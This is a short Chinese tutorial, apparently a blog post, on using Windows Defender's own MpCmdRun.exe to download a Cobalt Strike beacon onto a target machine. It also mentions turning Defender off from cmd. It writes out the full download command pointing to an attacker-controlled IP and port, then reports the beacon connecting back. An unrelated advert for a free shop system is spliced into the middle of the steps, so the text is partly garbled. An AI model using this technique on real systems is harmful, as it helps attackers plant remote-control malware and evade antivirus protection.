文章前言
Windows Defender是Windows 10系列自带的一款系统保护程序,可以对系统中的恶意程序、恶意行为进行查杀,与此同时,我们可以使用Windows Defender自带的命令执行工具"MpCmdRun.exe"来实现远程下载恶意文件的目的,但是免杀好像还是不太可靠,不过我们可以在cmd中关闭Windows Defender,所以这样一来,一结合就变得有意思多了,不管在使用该思路的过程中还需要权限提升,但是CS因为在后渗透测试中有很好的辅助功能,所以总体来说还是划算的~
具体实现
Step 1:在cobaltstrike中生成恶意攻击载荷
Step 2:在攻击主机中搭建web服务托管beacon.exe程序
MTTSHOP包包免费商城系统
下载
一款非常包包、衣服、鞋子类网站,页面干净清洁、一目了然,mttshop打造精致、简单、易用、免费的商城。 系统要求:IIS5.1以后,必须安装.net 3.5 安装步骤: 1、下载完成后,直接解压文件mttshop.rar 2、附加数据库:解压后的可以找一个叫db的文件夹,解压后直接附加就可以,支持SQL 2000、2005、2008 3、配置web.config文件,找到key=&qu
Step 3:在目标主机上使用Windows Defender自带的MpCmdRun.exe程序下载恶意文件
代码语言:javascript代码运行次数:0运行复制"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -DownloadFile -url http://192.168.188.129:6666/beacon.exe -path c:\\users\\resnd\\Desktop\\c-beacon.exe
Step 4:之后执行恶意文件,可以看到在CS中成功上线
